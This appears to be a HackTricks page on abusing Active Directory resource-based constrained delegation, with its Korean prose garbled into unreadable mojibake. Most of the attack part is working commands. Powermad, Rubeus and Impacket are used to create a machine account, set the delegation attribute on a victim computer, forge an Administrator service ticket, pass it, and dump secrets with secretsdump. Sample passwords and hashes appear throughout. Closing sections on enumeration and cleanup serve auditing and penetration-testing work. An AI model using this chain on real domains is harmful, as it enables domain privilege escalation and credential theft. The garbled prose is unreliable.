Resource-based Constrained Delegation
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Basics of Resource-based Constrained Delegation
์ด๊ฒ์ ๊ธฐ๋ณธ Constrained Delegation์ ์ ์ฌํ์ง๋ง ๋์ ๊ฐ์ฒด์ ์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ ์ ์๋ ๊ถํ์ ๋ถ์ฌํ๋ ๊ฒ์ด ์๋๋ผ, ๋ฆฌ์์ค ๊ธฐ๋ฐ ์ ์ฝ ์์์ ์ด๋ค ์ฌ์ฉ์๊ฐ ๊ทธ๊ฒ์ ๋ํด ๊ฐ์ฅํ ์ ์๋์ง๋ฅผ ์ค์ ํฉ๋๋ค.
์ด ๊ฒฝ์ฐ, ์ ์ฝ ๊ฐ์ฒด๋ _msDS-AllowedToActOnBehalfOfOtherIdentity_๋ผ๋ ์์ฑ์ ๊ฐ์ง๋ฉฐ, ์ด๋ ๊ทธ ๊ฐ์ฒด์ ๋ํด ๋ค๋ฅธ ์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ ์ ์๋ ์ฌ์ฉ์์ ์ด๋ฆ์ ํฌํจํฉ๋๋ค.
์ด ์ ์ฝ ์์๊ณผ ๋ค๋ฅธ ์์ ๊ฐ์ ๋ ๋ค๋ฅธ ์ค์ํ ์ฐจ์ด์ ์ ๊ธฐ๊ณ ๊ณ์ ์ ๋ํ ์ฐ๊ธฐ ๊ถํ(GenericAll/GenericWrite/WriteDacl/WriteProperty/etc)์ ๊ฐ์ง ์ฌ์ฉ์๋ **msDS-AllowedToActOnBehalfOfOtherIdentity**๋ฅผ ์ค์ ํ ์ ์๋ค๋ ๊ฒ์ ๋๋ค (๋ค๋ฅธ ํํ์ ์์์์๋ ๋๋ฉ์ธ ๊ด๋ฆฌ์ ๊ถํ์ด ํ์ํ์ต๋๋ค).
New Concepts
์ ์ฝ ์์์์๋ ์ฌ์ฉ์์ userAccountControl ๊ฐ ๋ด์ ์๋ TrustedToAuthForDelegation ํ๋๊ทธ๊ฐ S4U2Self๋ฅผ ์ํํ๋ ๋ฐ ํ์ํ๋ค๊ณ ์ธ๊ธ๋์์ต๋๋ค. ํ์ง๋ง ๊ทธ๊ฒ์ ์์ ํ ์ฌ์ค์ด ์๋๋๋ค.
์ค์ ๋ก๋ ๊ทธ ๊ฐ์ด ์๋๋ผ๋ ์๋น์ค(SPN์ด ์๋ ๊ฒฝ์ฐ)๋ผ๋ฉด ์ด๋ค ์ฌ์ฉ์์ ๋ํด์๋ S4U2Self๋ฅผ ์ํํ ์ ์์ง๋ง, **TrustedToAuthForDelegation**๊ฐ ์์ผ๋ฉด ๋ฐํ๋ TGS๋ Forwardable์ด ๋๊ณ , ๊ทธ ํ๋๊ทธ๊ฐ ์์ผ๋ฉด ๋ฐํ๋ TGS๋ Forwardable์ด ์๋๋๋ค.
๊ทธ๋ฌ๋ S4U2Proxy์์ ์ฌ์ฉ๋๋ TGS๊ฐ Forwardable์ด ์๋ ๊ฒฝ์ฐ, ๊ธฐ๋ณธ ์ ์ฝ ์์์ ์ ์ฉํ๋ ค๊ณ ํ๋ฉด ์๋ํ์ง ์์ต๋๋ค. ํ์ง๋ง ๋ฆฌ์์ค ๊ธฐ๋ฐ ์ ์ฝ ์์์ ์ ์ฉํ๋ ค๊ณ ํ๋ฉด ์๋ํฉ๋๋ค.
Attack structure
์ปดํจํฐ ๊ณ์ ์ ๋ํด ์ฐ๊ธฐ ๋๋ฑ ๊ถํ์ด ์๋ ๊ฒฝ์ฐ ํด๋น ๋จธ์ ์์ ํน๊ถ ์ก์ธ์ค๋ฅผ ์ป์ ์ ์์ต๋๋ค.
๊ณต๊ฒฉ์๊ฐ ์ด๋ฏธ ํฌ์ ์ปดํจํฐ์ ๋ํ ์ฐ๊ธฐ ๋๋ฑ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ค๊ณ ๊ฐ์ ํฉ๋๋ค.
- ๊ณต๊ฒฉ์๋ SPN์ด ์๋ ๊ณ์ ์ ํ๋ฝ์ํค๊ฑฐ๋ (โService Aโ) ํ๋๋ฅผ ์์ฑํฉ๋๋ค. ํน๋ณํ ๊ถํ ์์ด๋ ๋ชจ๋ _๊ด๋ฆฌ ์ฌ์ฉ์_๋ ์ต๋ 10๊ฐ์ ์ปดํจํฐ ๊ฐ์ฒด(MachineAccountQuota)๋ฅผ ์์ฑํ๊ณ SPN์ ์ค์ ํ ์ ์์ต๋๋ค. ๋ฐ๋ผ์ ๊ณต๊ฒฉ์๋ ๋จ์ํ ์ปดํจํฐ ๊ฐ์ฒด๋ฅผ ์์ฑํ๊ณ SPN์ ์ค์ ํ ์ ์์ต๋๋ค.
- ๊ณต๊ฒฉ์๋ ํฌ์ ์ปดํจํฐ(ServiceB)์ ๋ํ ์ฐ๊ธฐ ๊ถํ์ ์ ์ฉํ์ฌ ๋ฆฌ์์ค ๊ธฐ๋ฐ ์ ์ฝ ์์์ ๊ตฌ์ฑํ์ฌ ServiceA๊ฐ ํด๋น ํฌ์ ์ปดํจํฐ(ServiceB)์ ๋ํด ๋ชจ๋ ์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ ์ ์๋๋ก ํฉ๋๋ค.
- ๊ณต๊ฒฉ์๋ Rubeus๋ฅผ ์ฌ์ฉํ์ฌ Service A์์ Service B๋ก์ ์ ์ฒด S4U ๊ณต๊ฒฉ(S4U2Self ๋ฐ S4U2Proxy)์ ์ํํฉ๋๋ค. ์ด๋ Service B์ ๋ํ ํน๊ถ ์ก์ธ์ค๊ฐ ์๋ ์ฌ์ฉ์๋ฅผ ๋์์ผ๋ก ํฉ๋๋ค.
- S4U2Self (ํ๋ฝ์ํค๊ฑฐ๋ ์์ฑํ SPN์์): ๊ด๋ฆฌ์์๊ฒ TGS๋ฅผ ์์ฒญํฉ๋๋ค (Forwardable์ด ์๋).
- S4U2Proxy: ์ด์ ๋จ๊ณ์ Forwardable์ด ์๋ TGS๋ฅผ ์ฌ์ฉํ์ฌ ํฌ์ ํธ์คํธ์ ๋ํ ๊ด๋ฆฌ์์ TGS๋ฅผ ์์ฒญํฉ๋๋ค.
- Forwardable์ด ์๋ TGS๋ฅผ ์ฌ์ฉํ๋๋ผ๋ ๋ฆฌ์์ค ๊ธฐ๋ฐ ์ ์ฝ ์์์ ์ ์ฉํ๊ณ ์์ผ๋ฏ๋ก ์๋ํฉ๋๋ค.
- ๊ณต๊ฒฉ์๋ ํฐ์ผ์ ์ ๋ฌํ๊ณ **์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ์ฌ ํฌ์ ServiceB์ ๋ํ ์ก์ธ์ค๋ฅผ ์ป์ ์ ์์ต๋๋ค.
๋๋ฉ์ธ์ _MachineAccountQuota_๋ฅผ ํ์ธํ๋ ค๋ฉด ๋ค์์ ์ฌ์ฉํ ์ ์์ต๋๋ค:
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
๊ณต๊ฒฉ
์ปดํจํฐ ๊ฐ์ฒด ์์ฑ
**powermad**๋ฅผ ์ฌ์ฉํ์ฌ ๋๋ฉ์ธ ๋ด์ ์ปดํจํฐ ๊ฐ์ฒด๋ฅผ ์์ฑํ ์ ์์ต๋๋ค:
import-module powermad
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
# Check if created
Get-DomainComputer SERVICEA
๋ฆฌ์์ค ๊ธฐ๋ฐ ์ ์ฝ ์์ ๊ตฌ์ฑ
activedirectory PowerShell ๋ชจ๋ ์ฌ์ฉ
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
ํ์๋ทฐ ์ฌ์ฉํ๊ธฐ
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#Check that it worked
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}
Performing a complete S4U attack (Windows/Rubeus)
๋จผ์ , ์ฐ๋ฆฌ๋ ๋น๋ฐ๋ฒํธ 123456๋ก ์๋ก์ด ์ปดํจํฐ ๊ฐ์ฒด๋ฅผ ์์ฑํ์ผ๋ฏ๋ก, ํด๋น ๋น๋ฐ๋ฒํธ์ ํด์๊ฐ ํ์ํฉ๋๋ค:
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local
์ด๊ฒ์ ํด๋น ๊ณ์ ์ ๋ํ RC4 ๋ฐ AES ํด์๋ฅผ ์ถ๋ ฅํฉ๋๋ค.
์ด์ ๊ณต๊ฒฉ์ ์ํํ ์ ์์ต๋๋ค:
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
Rubeus์ /altservice ๋งค๊ฐ๋ณ์๋ฅผ ์ฌ์ฉํ์ฌ ํ ๋ฒ ์์ฒญํจ์ผ๋ก์จ ๋ ๋ง์ ์๋น์ค์ ๋ํ ๋ ๋ง์ ํฐ์ผ์ ์์ฑํ ์ ์์ต๋๋ค:
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
Caution
์ฌ์ฉ์๋ โ์์ํ ์ ์์โ์ด๋ผ๋ ์์ฑ์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ฌ์ฉ์๊ฐ ์ด ์์ฑ์ด True๋ก ์ค์ ๋์ด ์์ผ๋ฉด, ํด๋น ์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ ์ ์์ต๋๋ค. ์ด ์์ฑ์ bloodhound ๋ด์์ ํ์ธํ ์ ์์ต๋๋ค.
Linux ๋๊ตฌ: Impacket์ ์ฌ์ฉํ ์๋ ํฌ ์๋ RBCD (2024+)
Linux์์ ์์ ํ๋ ๊ฒฝ์ฐ, ๊ณต์ Impacket ๋๊ตฌ๋ฅผ ์ฌ์ฉํ์ฌ ์ ์ฒด RBCD ์ฒด์ธ์ ์ํํ ์ ์์ต๋๋ค:
# 1) Create attacker-controlled machine account (respects MachineAccountQuota)
impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'P@ss123' -dc-ip 192.168.56.10 'domain.local/jdoe:Summer2025!'
# 2) Grant RBCD on the target computer to FAKE01$
# -action write appends/sets the security descriptor for msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-to 'VICTIM$' -delegate-from 'FAKE01$' -dc-ip 192.168.56.10 -action write 'domain.local/jdoe:Summer2025!'
# 3) Request an impersonation ticket (S4U2Self+S4U2Proxy) for a privileged user against the victim service
impacket-getST -spn cifs/victim.domain.local -impersonate Administrator -dc-ip 192.168.56.10 'domain.local/FAKE01$:P@ss123'
# 4) Use the ticket (ccache) against the target service
export KRB5CCNAME=$(pwd)/Administrator.ccache
# Example: dump local secrets via Kerberos (no NTLM)
impacket-secretsdump -k -no-pass Administrator@victim.domain.local
๋ ธํธ
- LDAP ์๋ช
/LDAPS๊ฐ ๊ฐ์ ๋๋ ๊ฒฝ์ฐ,
impacket-rbcd -use-ldaps ...๋ฅผ ์ฌ์ฉํ์ญ์์ค. - AES ํค๋ฅผ ์ ํธํ์ญ์์ค; ๋ง์ ํ๋ ๋๋ฉ์ธ์ด RC4๋ฅผ ์ ํํฉ๋๋ค. Impacket๊ณผ Rubeus๋ ๋ชจ๋ AES ์ ์ฉ ํ๋ฆ์ ์ง์ํฉ๋๋ค.
- Impacket์ ์ผ๋ถ ๋๊ตฌ์ ๋ํด
sname(โAnySPNโ)์ ์ฌ์์ฑํ ์ ์์ง๋ง, ๊ฐ๋ฅํ ๊ฒฝ์ฐ ํญ์ ์ฌ๋ฐ๋ฅธ SPN์ ์ป์ผ์ญ์์ค (์: CIFS/LDAP/HTTP/HOST/MSSQLSvc).
์ ๊ทผ
๋ง์ง๋ง ๋ช
๋ น์ค์ ์์ ํ S4U ๊ณต๊ฒฉ์ ์ํํ๊ณ TGS๋ฅผ ๊ด๋ฆฌ์์์ ํผํด์ ํธ์คํธ์ ๋ฉ๋ชจ๋ฆฌ๋ก ์ฃผ์
ํฉ๋๋ค.
์ด ์์์๋ ๊ด๋ฆฌ์์๊ฒ์ CIFS ์๋น์ค์ ๋ํ TGS๊ฐ ์์ฒญ๋์์ผ๋ฏ๋ก **C$**์ ์ ๊ทผํ ์ ์์ต๋๋ค:
ls \\victim.domain.local\C$
๋ค์ํ ์๋น์ค ํฐ์ผ ๋จ์ฉ
์ฌ์ฉ ๊ฐ๋ฅํ ์๋น์ค ํฐ์ผ์ ๋ํด ์ฌ๊ธฐ์์ ์์๋ณด์ธ์.
์ด๊ฑฐ, ๊ฐ์ฌ ๋ฐ ์ ๋ฆฌ
RBCD๊ฐ ๊ตฌ์ฑ๋ ์ปดํจํฐ ์ด๊ฑฐ
PowerShell (SID๋ฅผ ํด๊ฒฐํ๊ธฐ ์ํด SD๋ฅผ ๋์ฝ๋ฉ):
# List all computers with msDS-AllowedToActOnBehalfOfOtherIdentity set and resolve principals
Import-Module ActiveDirectory
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
Where-Object { $_."msDS-AllowedToActOnBehalfOfOtherIdentity" } |
ForEach-Object {
$raw = $_."msDS-AllowedToActOnBehalfOfOtherIdentity"
$sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $raw, 0
$sd.DiscretionaryAcl | ForEach-Object {
$sid = $_.SecurityIdentifier
try { $name = $sid.Translate([System.Security.Principal.NTAccount]) } catch { $name = $sid.Value }
[PSCustomObject]@{ Computer=$_.ObjectDN; Principal=$name; SID=$sid.Value; Rights=$_.AccessMask }
}
}
Impacket (ํ ๋ช ๋ น์ด๋ก ์ฝ๊ฑฐ๋ ํ๋ฌ์ํ๊ธฐ):
# Read who can delegate to VICTIM
impacket-rbcd -delegate-to 'VICTIM$' -action read 'domain.local/jdoe:Summer2025!'
Cleanup / reset RBCD
- PowerShell (์์ฑ ์ง์ฐ๊ธฐ):
Set-ADComputer $targetComputer -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
# Or using the friendly property
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount $null
- Impacket:
# Remove a specific principal from the SD
impacket-rbcd -delegate-to 'VICTIM$' -delegate-from 'FAKE01$' -action remove 'domain.local/jdoe:Summer2025!'
# Or flush the whole list
impacket-rbcd -delegate-to 'VICTIM$' -action flush 'domain.local/jdoe:Summer2025!'
Kerberos ์ค๋ฅ
KDC_ERR_ETYPE_NOTSUPP: ์ด๋ kerberos๊ฐ DES ๋๋ RC4๋ฅผ ์ฌ์ฉํ์ง ์๋๋ก ๊ตฌ์ฑ๋์ด ์์ผ๋ฉฐ, RC4 ํด์๋ง ์ ๊ณตํ๊ณ ์์์ ์๋ฏธํฉ๋๋ค. Rubeus์ ์ต์ํ AES256 ํด์(๋๋ rc4, aes128 ๋ฐ aes256 ํด์๋ฅผ ๋ชจ๋ ์ ๊ณต)๋ฅผ ๊ณต๊ธํ์ญ์์ค. ์:[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())KRB_AP_ERR_SKEW: ์ด๋ ํ์ฌ ์ปดํจํฐ์ ์๊ฐ์ด DC์ ์๊ฐ๊ณผ ๋ค๋ฅด๋ฉฐ kerberos๊ฐ ์ ๋๋ก ์๋ํ์ง ์์์ ์๋ฏธํฉ๋๋ค.preauth_failed: ์ด๋ ์ฃผ์ด์ง ์ฌ์ฉ์ ์ด๋ฆ + ํด์๊ฐ ๋ก๊ทธ์ธ์ ์คํจํ์์ ์๋ฏธํฉ๋๋ค. ํด์๋ฅผ ์์ฑํ ๋ ์ฌ์ฉ์ ์ด๋ฆ์ โ$โ๋ฅผ ๋ฃ๋ ๊ฒ์ ์์์ ์ ์์ต๋๋ค (.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local)KDC_ERR_BADOPTION: ์ด๋ ๋ค์์ ์๋ฏธํ ์ ์์ต๋๋ค:- ๋น์ ์ด ๊ฐ์ฅํ๋ ค๋ ์ฌ์ฉ์๊ฐ ์ํ๋ ์๋น์ค์ ์ ๊ทผํ ์ ์์ต๋๋ค (๊ฐ์ฅํ ์ ์๊ฑฐ๋ ์ถฉ๋ถํ ๊ถํ์ด ์๊ธฐ ๋๋ฌธ)
- ์์ฒญํ ์๋น์ค๊ฐ ์กด์ฌํ์ง ์์ต๋๋ค (winrm์ ๋ํ ํฐ์ผ์ ์์ฒญํ์ง๋ง winrm์ด ์คํ๋๊ณ ์์ง ์์ ๊ฒฝ์ฐ)
- ์์ฑ๋ fakecomputer๊ฐ ์ทจ์ฝํ ์๋ฒ์ ๋ํ ๊ถํ์ ์์์ผ๋ฉฐ, ์ด๋ฅผ ๋ค์ ๋ถ์ฌํด์ผ ํฉ๋๋ค.
- ๋น์ ์ด ๊ณ ์ KCD๋ฅผ ๋จ์ฉํ๊ณ ์์ต๋๋ค; RBCD๋ ๋น์ ๋ฌ ๊ฐ๋ฅํ S4U2Self ํฐ์ผ๊ณผ ํจ๊ป ์๋ํ๋ ๋ฐ๋ฉด, KCD๋ ์ ๋ฌ ๊ฐ๋ฅํ ๊ฒ์ ์๊ตฌํฉ๋๋ค.
๋ ธํธ, ๋ฆด๋ ์ด ๋ฐ ๋์
- LDAP๊ฐ ํํฐ๋ง๋ ๊ฒฝ์ฐ AD ์น ์๋น์ค(ADWS)์์ RBCD SD๋ฅผ ์์ฑํ ์๋ ์์ต๋๋ค. ์ฐธ์กฐ:
- Kerberos ๋ฆด๋ ์ด ์ฒด์ธ์ ์ข ์ข RBCD๋ก ๋๋๋ฉฐ, ํ ๋จ๊ณ์์ ๋ก์ปฌ SYSTEM์ ๋ฌ์ฑํฉ๋๋ค. ์ค์ฉ์ ์ธ ์๋ ํฌ ์๋ ์์ ๋ฅผ ์ฐธ์กฐํ์ญ์์ค:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
์ฐธ์กฐ
- https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object
- https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/
- https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61
- Impacket rbcd.py (๊ณต์): https://github.com/fortra/impacket/blob/master/examples/rbcd.py
- ์ต๊ทผ ๊ตฌ๋ฌธ์ด ํฌํจ๋ ๋น ๋ฅธ Linux ์นํธ์ํธ: https://tldrbins.github.io/rbcd/
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


